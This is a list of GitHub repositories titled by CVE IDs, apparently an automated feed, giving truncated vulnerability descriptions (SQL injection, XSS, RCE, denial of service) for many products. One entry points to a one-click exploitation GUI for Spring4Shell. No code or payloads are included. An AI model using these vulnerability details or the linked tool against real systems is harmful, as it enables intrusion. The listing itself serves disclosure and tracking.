**Delta Electronics InfraSuite Device Master versions 00.00.01a and prior lack proper authentication for functions that create and modify user groups. An attacker could provide malicious serialized objects that could run these functions without authentication to create a new user and add them to the administrator group. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41688](https://github.com/Live-Hack-CVE/CVE-2022-41688) create time: 2022-12-28T15:06:28Z

**Delta Electronics InfraSuite Device Master Versions 00.00.01a and prior mishandle .ZIP archives containing characters used in path traversal. This path traversal could result in remote code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41772](https://github.com/Live-Hack-CVE/CVE-2022-41772) create time: 2022-12-28T15:06:25Z

**Delta Electronics InfraSuite Device Master Versions 00.00.01a and prior allow attacker provided data already serialized into memory to be used in file operation application programmable interfaces (APIs). This could create arbitrary files, which could be used in API operations and could ultimately result in remote code CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41657](https://github.com/Live-Hack-CVE/CVE-2022-41657) create time: 2022-12-28T15:06:21Z

**SAUTER Controls moduWeb firmware version 2.7.1 is vulnerable to reflective cross-site scripting (XSS). The web application does not adequately sanitize request strings of malicious JavaScript. An attacker utilizing XSS could then execute malicious code in users’ browsers and steal sensitive information, including user CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40190](https://github.com/Live-Hack-CVE/CVE-2022-40190) create time: 2022-12-28T15:06:18Z

**open5gs v2.4.11 was discovered to contain a memory leak in the component src/upf/pfcp-path.c. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted PFCP packet. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43221](https://github.com/Live-Hack-CVE/CVE-2022-43221) create time: 2022-12-28T15:06:10Z

**open5gs v2.4.11 was discovered to contain a memory leak in the component ngap-handler.c. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted UE attachment. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43223](https://github.com/Live-Hack-CVE/CVE-2022-43223) create time: 2022-12-28T15:06:06Z

**open5gs v2.4.11 was discovered to contain a memory leak in the component src/smf/pfcp-path.c. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted PFCP packet. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43222](https://github.com/Live-Hack-CVE/CVE-2022-43222) create time: 2022-12-28T15:06:03Z

**A vulnerability, which was classified as critical, has been found in IBAX go-ibax. Affected by this issue is some unknown functionality of the file /api/v2/open/rowsInfo. The manipulation of the argument table_name leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3800](https://github.com/Live-Hack-CVE/CVE-2022-3800) create time: 2022-12-28T15:05:59Z

**A vulnerability classified as critical was found in IBAX go-ibax. Affected by this vulnerability is an unknown functionality of the file /api/v2/open/tablesInfo. The manipulation leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated ide CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3799](https://github.com/Live-Hack-CVE/CVE-2022-3799) create time: 2022-12-28T15:05:55Z

**A vulnerability classified as critical has been found in IBAX go-ibax. Affected is an unknown function of the file /api/v2/open/tablesInfo. The manipulation leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-212634 is the identifier as CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3798](https://github.com/Live-Hack-CVE/CVE-2022-3798) create time: 2022-12-28T15:05:51Z

**A vulnerability, which was classified as critical, was found in IBAX go-ibax. This affects an unknown part of the file /api/v2/open/rowsInfo. The manipulation of the argument order leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The i CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3801](https://github.com/Live-Hack-CVE/CVE-2022-3801) create time: 2022-12-28T15:05:47Z

**Cross-site scripting (XSS) vulnerability in jquery.ui.dialog.js in the Dialog widget in jQuery UI before 1.10.0 allows remote attackers to inject arbitrary web script or HTML via the title option. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2010-5312](https://github.com/Live-Hack-CVE/CVE-2010-5312) create time: 2022-12-28T14:15:16Z

**Use-after-free vulnerability in the sctp_assoc_update function in net/sctp/associola.c in the Linux kernel before 3.18.8 allows remote attackers to cause a denial of service (slab corruption and panic) or possibly have unspecified other impact by triggering an INIT collision that leads to improper handling of shared-ke CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-1421](https://github.com/Live-Hack-CVE/CVE-2015-1421) create time: 2022-12-28T14:15:58Z

**udp.c in the Linux kernel before 4.5 allows remote attackers to execute arbitrary code via UDP traffic that triggers an unsafe second checksum calculation during execution of a recv system call with the MSG_PEEK flag. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-10229](https://github.com/Live-Hack-CVE/CVE-2016-10229) create time: 2022-12-28T14:16:02Z

**The usbip_recv_xbuff function in drivers/usb/usbip/usbip_common.c in the Linux kernel before 4.5.3 allows remote attackers to cause a denial of service (out-of-bounds write) or possibly have unspecified other impact via a crafted length value in a USB/IP packet. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-3955](https://github.com/Live-Hack-CVE/CVE-2016-3955) create time: 2022-12-28T14:15:55Z

**MKCMS V6.2 has SQL injection via the /ucenter/repass.php name parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-22820](https://github.com/Live-Hack-CVE/CVE-2020-22820) create time: 2022-12-28T14:16:35Z

**MKCMS V6.2 has SQL injection via the /ucenter/active.php verify parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-22819](https://github.com/Live-Hack-CVE/CVE-2020-22819) create time: 2022-12-28T14:16:28Z

**A flaw was found in X.Org Server before xorg-x11-server 1.20.9. An Integer underflow leading to heap-buffer overflow may lead to a privilege escalation vulnerability. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-14361](https://github.com/Live-Hack-CVE/CVE-2020-14361) create time: 2022-12-28T14:16:09Z

**A flaw was found in X.Org Server before xorg-x11-server 1.20.9. An Integer underflow leading to heap-buffer overflow may lead to a privilege escalation vulnerability. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-14362](https://github.com/Live-Hack-CVE/CVE-2020-14362) create time: 2022-12-28T14:16:06Z

**Node.js before 16.6.1, 14.17.5, and 12.22.5 is vulnerable to a use after free attack where an attacker might be able to exploit the memory corruption, to change process behavior. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-22940](https://github.com/Live-Hack-CVE/CVE-2021-22940) create time: 2022-12-28T14:15:51Z

**Node.js before 16.6.0, 14.17.4, and 12.22.4 is vulnerable to a use after free attack where an attacker might be able to exploit the memory corruption, to change process behavior. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-22930](https://github.com/Live-Hack-CVE/CVE-2021-22930) create time: 2022-12-28T14:15:45Z

**In the thymeleaf-spring5:3.0.12 component, thymeleaf combined with specific scenarios in template injection may lead to remote code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-43466](https://github.com/Live-Hack-CVE/CVE-2021-43466) create time: 2022-12-28T14:15:41Z

**A buffer overflow vulnerability in CDataMoji of the jwwlib component of LibreCAD 2.2.0-rc3 and older allows an attacker to achieve Remote Code Execution using a crafted JWW document. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-45341](https://github.com/Live-Hack-CVE/CVE-2021-45341) create time: 2022-12-28T14:15:38Z

**Pentaho Business Analytics Server versions before 9.2.0.2 and 8.3.0.25 using the Pentaho Analyzer plugin exposes a service endpoint for templates which allows a user-supplied path to access resources that are out of bounds. The software uses external input to construct a pathname that is intended to identify a file or CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-45448](https://github.com/Live-Hack-CVE/CVE-2021-45448) create time: 2022-12-28T13:43:46Z

**Hitachi Vantara Pentaho Business Analytics Server versions before 9.3.0.0, 9.2.0.2 and 8.3.0.25 with the Data Lineage feature enabled transmits database passwords in clear text. The transmission of sensitive data in clear text allows unauthorized actors with access to the network to sniff and obtain sensitive informati CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-45447](https://github.com/Live-Hack-CVE/CVE-2021-45447) create time: 2022-12-28T13:42:19Z

**Netskope client is impacted by a vulnerability where an authenticated, local attacker can view sensitive information stored in NSClient logs which should be restricted. The vulnerability exists because the sensitive information is not masked/scrubbed before writing in the logs. A malicious user can use the sensitive in CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-44862](https://github.com/Live-Hack-CVE/CVE-2021-44862) create time: 2022-12-28T13:42:16Z

**A vulnerability in Hitachi Vantara Pentaho Business Analytics Server versions before 9.2.0.2 and 8.3.0.25 does not cascade the hidden property to the children of the Home folder. This directory listing provides an attacker with the complete index of all the resources located inside the directory. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-45446](https://github.com/Live-Hack-CVE/CVE-2021-45446) create time: 2022-12-28T13:41:59Z

**Multiple Insecure Direct Object References (IDOR) vulnerabilities in ExpressTech Quiz And Survey Master plugin <= 7.3.6 on WordPress. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-36906](https://github.com/Live-Hack-CVE/CVE-2021-36906) create time: 2022-12-28T13:41:13Z

**NULL Pointer Deference in the exif command line tool, when printing out XML formatted EXIF data, in exif v0.6.22 and earlier allows attackers to cause a Denial of Service (DoS) by uploading a malicious JPEG file, causing the application to crash. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-27815](https://github.com/Live-Hack-CVE/CVE-2021-27815) create time: 2022-12-28T13:39:49Z

**FreeRDP is a free implementation of the Remote Desktop Protocol (RDP), released under the Apache license. All FreeRDP clients prior to version 2.4.1 using gateway connections (`/gt:rpc`) fail to validate input data. A malicious gateway might allow client memory to be written out of bounds. This issue has been resolved CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-41159](https://github.com/Live-Hack-CVE/CVE-2021-41159) create time: 2022-12-28T13:39:46Z

**GDAL 3.3.0 through 3.4.0 has a heap-based buffer overflow in PCIDSK::CPCIDSKFile::ReadFromFile (called from PCIDSK::CPCIDSKSegment::ReadFromFile and PCIDSK::CPCIDSKBinarySegment::CPCIDSKBinarySegment). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-45943](https://github.com/Live-Hack-CVE/CVE-2021-45943) create time: 2022-12-28T13:39:21Z

**A double free in cleanup_index in index.c in Halibut 1.2 allows an attacker to cause a denial of service or possibly have other unspecified impact via a crafted text document. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-42613](https://github.com/Live-Hack-CVE/CVE-2021-42613) create time: 2022-12-28T13:37:50Z

**A use after free in cleanup_index in index.c in Halibut 1.2 allows an attacker to cause a segmentation fault or possibly have other unspecified impact via a crafted text document. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-42612](https://github.com/Live-Hack-CVE/CVE-2021-42612) create time: 2022-12-28T13:37:46Z

**A use after free in info_width_internal in bk_info.c in Halibut 1.2 allows an attacker to cause a segmentation fault or possibly have unspecified other impact via a crafted text document. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-42614](https://github.com/Live-Hack-CVE/CVE-2021-42614) create time: 2022-12-28T13:37:43Z

**Elasticsearch before 7.14.0 did not apply document and field level security to searchable snapshots. This could lead to an authenticated user gaining access to information that they are unauthorized to view. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-22147](https://github.com/Live-Hack-CVE/CVE-2021-22147) create time: 2022-12-28T13:36:23Z

**In Elasticsearch versions before 7.11.2 and 6.8.15 a document disclosure flaw was found when Document or Field Level Security is used. Search queries do not properly preserve security permissions when executing certain cross-cluster search queries. This could result in the search disclosing the existence of documents t CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-22137](https://github.com/Live-Hack-CVE/CVE-2021-22137) create time: 2022-12-28T13:36:20Z

**Infinite loop in the RTMPT dissector in Wireshark 3.6.0 and 3.4.0 to 3.4.10 allows denial of service via packet injection or crafted capture file CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4185](https://github.com/Live-Hack-CVE/CVE-2021-4185) create time: 2022-12-28T13:36:13Z

**Crash in the Sysdig Event dissector in Wireshark 3.6.0 and 3.4.0 to 3.4.10 allows denial of service via packet injection or crafted capture file CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4181](https://github.com/Live-Hack-CVE/CVE-2021-4181) create time: 2022-12-28T13:34:53Z

**Crash in the RFC 7468 dissector in Wireshark 3.6.0 and 3.4.0 to 3.4.10 allows denial of service via packet injection or crafted capture file CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4182](https://github.com/Live-Hack-CVE/CVE-2021-4182) create time: 2022-12-28T13:34:50Z

**Large loop in the Kafka dissector in Wireshark 3.6.0 allows denial of service via packet injection or crafted capture file CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4190](https://github.com/Live-Hack-CVE/CVE-2021-4190) create time: 2022-12-28T13:34:46Z

**Crash in the pcapng file parser in Wireshark 3.6.0 allows denial of service via crafted capture file CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4183](https://github.com/Live-Hack-CVE/CVE-2021-4183) create time: 2022-12-28T13:34:43Z

**Infinite loop in the BitTorrent DHT dissector in Wireshark 3.6.0 and 3.4.0 to 3.4.10 allows denial of service via packet injection or crafted capture file CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4184](https://github.com/Live-Hack-CVE/CVE-2021-4184) create time: 2022-12-28T13:34:40Z

**Crash in the Gryphon dissector in Wireshark 3.4.0 to 3.4.10 allows denial of service via packet injection or crafted capture file CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4186](https://github.com/Live-Hack-CVE/CVE-2021-4186) create time: 2022-12-28T13:34:36Z

**The nameserver caching daemon (nscd) in the GNU C Library (aka glibc or libc6) 2.29 through 2.33, when processing a request for netgroup lookup, may crash due to a double-free, potentially resulting in degraded service or Denial of Service on the local system. This is related to netgroupcache.c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-27645](https://github.com/Live-Hack-CVE/CVE-2021-27645) create time: 2022-12-28T13:34:17Z

**The iconv function in the GNU C Library (aka glibc or libc6) 2.32 and earlier, when processing invalid input sequences in the ISO-2022-JP-3 encoding, fails an assertion in the code path and aborts the program, potentially resulting in a denial of service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3326](https://github.com/Live-Hack-CVE/CVE-2021-3326) create time: 2022-12-28T13:34:13Z

**In JetBrains TeamCity version before 2022.10, Password parameters could be exposed in the build log if they contained special characters CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44624](https://github.com/Live-Hack-CVE/CVE-2022-44624) create time: 2022-12-28T14:16:31Z

**Safe Software FME Server v2021.2.5, v2022.0.0.2 and below was discovered to contain a Path Traversal vulnerability via the component fmedataupload. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38340](https://github.com/Live-Hack-CVE/CVE-2022-38340) create time: 2022-12-28T14:16:24Z

**Safe Software FME Server v2021.2.5 and below does not employ server-side validation. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38341](https://github.com/Live-Hack-CVE/CVE-2022-38341) create time: 2022-12-28T14:16:21Z

**Safe Software FME Server v2021.2.5, v2022.0.0.2 and below contains a cross-site scripting (XSS) vulnerability which allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the login page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38339](https://github.com/Live-Hack-CVE/CVE-2022-38339) create time: 2022-12-28T14:16:17Z

**In JetBrains TeamCity version before 2022.10, Project Viewer could see scrambled secure values in the MetaRunner settings CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44623](https://github.com/Live-Hack-CVE/CVE-2022-44623) create time: 2022-12-28T14:16:13Z

**Double free vulnerability in the storage module. Successful exploitation of this vulnerability will cause the memory to be freed twice. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39002](https://github.com/Live-Hack-CVE/CVE-2022-39002) create time: 2022-12-28T14:15:34Z

**An issue was discovered in MediaWiki before 1.35.6, 1.36.x before 1.36.4, and 1.37.x before 1.37.2. Users with the editinterface permission can trigger infinite recursion, because a bare local interwiki is mishandled for the mainpage message. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-28201](https://github.com/Live-Hack-CVE/CVE-2022-28201) create time: 2022-12-28T14:15:31Z

**A denial-of-service issue was discovered in MediaWiki before 1.35.6, 1.36.x before 1.36.4, and 1.37.x before 1.37.2. When many files exist, requesting Special:NewFiles with actor as a condition can result in a very long running query. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-28203](https://github.com/Live-Hack-CVE/CVE-2022-28203) create time: 2022-12-28T14:15:27Z

**By spoofing the target resolver with responses that have a malformed ECDSA signature, an attacker can trigger a small memory leak. It is possible to gradually erode available memory to the point where named crashes for lack of resources. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38177](https://github.com/Live-Hack-CVE/CVE-2022-38177) create time: 2022-12-28T14:15:24Z

**By flooding the target resolver with queries exploiting this flaw an attacker can significantly impair the resolver's performance, effectively denying legitimate clients access to the DNS resolution service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2795](https://github.com/Live-Hack-CVE/CVE-2022-2795) create time: 2022-12-28T14:15:20Z

**A vulnerability, which was classified as problematic, was found in Webmin. Affected is an unknown function of the file xterm/index.cgi. The manipulation leads to basic cross site scripting. It is possible to launch the attack remotely. The name of the patch is d3d33af3c0c3fd3a889c84e287a038b7a457d811. It is recommended CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3844](https://github.com/Live-Hack-CVE/CVE-2022-3844) create time: 2022-12-28T13:45:03Z

**A vulnerability has been found in phpipam and classified as problematic. Affected by this vulnerability is an unknown functionality of the file app/admin/import-export/import-load-data.php of the component Import Preview Handler. The manipulation leads to cross site scripting. The attack can be launched remotely. Upgra CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3845](https://github.com/Live-Hack-CVE/CVE-2022-3845) create time: 2022-12-28T13:44:39Z

**An Improper Input Validation vulnerability exists in Trihedral VTScada version 12.0.38 and prior. A specifically malformed HTTP request could cause the affected VTScada to crash. Both local area network (LAN)-only and internet facing systems are affected. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3181](https://github.com/Live-Hack-CVE/CVE-2022-3181) create time: 2022-12-28T13:44:35Z

**A logic issue was addressed with improved restrictions. This issue is fixed in macOS Monterey 12.6, iOS 15.7 and iPadOS 15.7, iOS 16, macOS Big Sur 11.7. An app may be able to read sensitive location information. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32883](https://github.com/Live-Hack-CVE/CVE-2022-32883) create time: 2022-12-28T13:44:32Z

**A memory corruption issue was addressed with improved input validation. This issue is fixed in macOS Monterey 12.6, iOS 15.7 and iPadOS 15.7, iOS 16, macOS Big Sur 11.7. A user may be able to elevate privileges. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32908](https://github.com/Live-Hack-CVE/CVE-2022-32908) create time: 2022-12-28T13:44:28Z

**Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in AgentEasy Properties plugin <= 1.0.4 on WordPress. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44576](https://github.com/Live-Hack-CVE/CVE-2022-44576) create time: 2022-12-28T13:44:25Z

**The issue was addressed with improved memory handling. This issue is fixed in macOS Monterey 12.6, iOS 15.7 and iPadOS 15.7, iOS 16, macOS Big Sur 11.7. An app may be able to execute arbitrary code with kernel privileges. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32911](https://github.com/Live-Hack-CVE/CVE-2022-32911) create time: 2022-12-28T13:44:21Z

**Auth. (admin+) Stored Cross-Site Scripting (XSS) in Ayoub Media AM-HiLi plugin <= 1.0 on WordPress. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44586](https://github.com/Live-Hack-CVE/CVE-2022-44586) create time: 2022-12-28T13:44:18Z

**GPAC v2.1-DEV-rev368-gfd054169b-master was discovered to contain a memory leak via the component gf_list_new at utils/list.c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43254](https://github.com/Live-Hack-CVE/CVE-2022-43254) create time: 2022-12-28T13:44:14Z

**GPAC v2.1-DEV-rev368-gfd054169b-master was discovered to contain a memory leak via the component gf_odf_new_iod at odf/odf_code.c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43255](https://github.com/Live-Hack-CVE/CVE-2022-43255) create time: 2022-12-28T13:44:11Z

**The application was vulnerable to a session fixation that could be used hijack accounts. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40293](https://github.com/Live-Hack-CVE/CVE-2022-40293) create time: 2022-12-28T13:44:08Z

**The Restaurant Menu – Food Ordering System – Table Reservation plugin for WordPress is vulnerable to authorization bypass via several AJAX actions in versions up to, and including 2.3.0 due to missing capability checks and missing nonce validation. This makes it possible for authenticated attackers with minimal permiss CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2696](https://github.com/Live-Hack-CVE/CVE-2022-2696) create time: 2022-12-28T13:44:04Z

**The Restaurant Menu – Food Ordering System – Table Reservation plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.3.1. This is due to missing or incorrect nonce validation on several functions called via AJAX actions such as forms_action, set_option, & chosen_options to CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3776](https://github.com/Live-Hack-CVE/CVE-2022-3776) create time: 2022-12-28T13:44:00Z

**In JetBrains TeamCity version between 2021.2 and 2022.10 access permissions for secure token health items were excessive CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44622](https://github.com/Live-Hack-CVE/CVE-2022-44622) create time: 2022-12-28T13:43:57Z

**Adobe Commerce versions 2.4.3-p2 (and earlier), 2.3.7-p3 (and earlier) and 2.4.4 (and earlier) are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when th CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34257](https://github.com/Live-Hack-CVE/CVE-2022-34257) create time: 2022-12-28T13:43:53Z

**Muhammara is a node module with c/cpp bindings to modify PDF with js for node or electron (based/replacement on/of galkhana/hummusjs). The package muhammara before 2.6.0; all versions of package hummus are vulnerable to Denial of Service (DoS) when supplied with a maliciously crafted PDF file to be appended to another. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39381](https://github.com/Live-Hack-CVE/CVE-2022-39381) create time: 2022-12-28T13:43:50Z

**Adobe Commerce versions 2.4.3-p2 (and earlier), 2.3.7-p3 (and earlier) and 2.4.4 (and earlier) are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker with admin privileges to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a vi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34258](https://github.com/Live-Hack-CVE/CVE-2022-34258) create time: 2022-12-28T13:43:43Z

**A use after free issue was addressed with improved memory management. This issue is fixed in iOS 16.1 and iPadOS 16, macOS Ventura 13. An app with root privileges may be able to execute arbitrary code with kernel privileges. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42829](https://github.com/Live-Hack-CVE/CVE-2022-42829) create time: 2022-12-28T13:43:39Z

**Adobe Photoshop versions 22.5.8 (and earlier) and 23.4.2 (and earlier) are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38434](https://github.com/Live-Hack-CVE/CVE-2022-38434) create time: 2022-12-28T13:43:36Z

**CVE-2022-22965\Spring-Core-RCE核弹级别漏洞的rce图形化GUI一键利用工具,基于JavaFx开发,图形化操作更简单,提高效率。** : [zangcc/CVE-2022-22965-rexbb](https://github.com/zangcc/CVE-2022-22965-rexbb) create time: 2022-12-28T04:50:16Z

**The mcrypt_create_iv function in ext/mcrypt/mcrypt.c in PHP before 4.4.7, 5.2.1, and possibly 5.0.x and other PHP 5 versions, calls php_rand_r with an uninitialized seed variable and therefore always generates the same initialization vector (IV), which might allow context-dependent attackers to decrypt certain data mor CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2007-2727](https://github.com/Live-Hack-CVE/CVE-2007-2727) create time: 2022-12-28T12:59:13Z

**The donote function in readelf.c in file through 5.20, as used in the Fileinfo component in PHP 5.4.34, does not ensure that sufficient note headers are present, which allows remote attackers to cause a denial of service (out-of-bounds read and application crash) via a crafted ELF file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-3710](https://github.com/Live-Hack-CVE/CVE-2014-3710) create time: 2022-12-28T13:02:24Z

**Stack consumption vulnerability in Zend/zend_exceptions.c in PHP before 5.4.44, 5.5.x before 5.5.28, and 5.6.x before 5.6.12 allows remote attackers to cause a denial of service (segmentation fault) via recursive method calls. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-8873](https://github.com/Live-Hack-CVE/CVE-2015-8873) create time: 2022-12-28T13:02:31Z

**The build_tablename function in pgsql.c in the PostgreSQL (aka pgsql) extension in PHP through 5.6.7 does not validate token extraction for table names, which allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a crafted name. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-1352](https://github.com/Live-Hack-CVE/CVE-2015-1352) create time: 2022-12-28T13:02:28Z

**Piwigo is image gallery software written in PHP. When a criteria is not met on a host, piwigo defaults to usingmt_rand in order to generate password reset tokens. mt_rand output can be predicted after recovering the seed used to generate it. This low an unauthenticated attacker to take over an account providing they kn CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-3735](https://github.com/Live-Hack-CVE/CVE-2016-3735) create time: 2022-12-28T12:55:39Z

**A vulnerability classified as problematic was found in Python 2.7.13. This vulnerability affects unknown code of the component pgAdmin4. The manipulation leads to uncontrolled search path. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-20052](https://github.com/Live-Hack-CVE/CVE-2017-20052) create time: 2022-12-28T13:01:32Z

**A memory leak in the i2400m_op_rfkill_sw_toggle() function in drivers/net/wimax/i2400m/op-rfkill.c in the Linux kernel before 5.3.11 allows attackers to cause a denial of service (memory consumption), aka CID-6f3ef5c25cc7. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-19051](https://github.com/Live-Hack-CVE/CVE-2019-19051) create time: 2022-12-28T12:59:17Z

**Two memory leaks in the v3d_submit_cl_ioctl() function in drivers/gpu/drm/v3d/v3d_gem.c in the Linux kernel before 5.3.11 allow attackers to cause a denial of service (memory consumption) by triggering kcalloc() or v3d_job_init() failures, aka CID-29cd13cfd762. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-19044](https://github.com/Live-Hack-CVE/CVE-2019-19044) create time: 2022-12-28T12:59:06Z

**Two memory leaks in the mwifiex_pcie_init_evt_ring() function in drivers/net/wireless/marvell/mwifiex/pcie.c in the Linux kernel through 5.3.11 allow attackers to cause a denial of service (memory consumption) by triggering mwifiex_map_pci_memory() failures, aka CID-d10dcb615c8e. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-19057](https://github.com/Live-Hack-CVE/CVE-2019-19057) create time: 2022-12-28T12:59:03Z

**A memory leak in the rpmsg_eptdev_write_iter() function in drivers/rpmsg/rpmsg_char.c in the Linux kernel through 5.3.11 allows attackers to cause a denial of service (memory consumption) by triggering copy_from_iter_full() failures, aka CID-bbe692e349e2. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-19053](https://github.com/Live-Hack-CVE/CVE-2019-19053) create time: 2022-12-28T12:58:52Z

**Two memory leaks in the rtl_usb_probe() function in drivers/net/wireless/realtek/rtlwifi/usb.c in the Linux kernel through 5.3.11 allow attackers to cause a denial of service (memory consumption), aka CID-3f9361695113. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-19063](https://github.com/Live-Hack-CVE/CVE-2019-19063) create time: 2022-12-28T12:57:43Z

**An issue was discovered in bluetoothd in BlueZ through 5.48. The vulnerability lies in the handling of a SVC_ATTR_REQ by the SDP implementation. By crafting a malicious CSTATE, it is possible to trick the server into returning more bytes than the buffer actually holds, resulting in leaking arbitrary heap data. The root CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-8921](https://github.com/Live-Hack-CVE/CVE-2019-8921) create time: 2022-12-28T12:57:26Z

**Openwsman, versions up to and including 2.6.9, are vulnerable to arbitrary file disclosure because the working directory of openwsmand daemon was set to root directory. A remote, unauthenticated attacker can exploit this vulnerability by sending a specially crafted HTTP request to openwsman server. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-3816](https://github.com/Live-Hack-CVE/CVE-2019-3816) create time: 2022-12-28T12:55:19Z

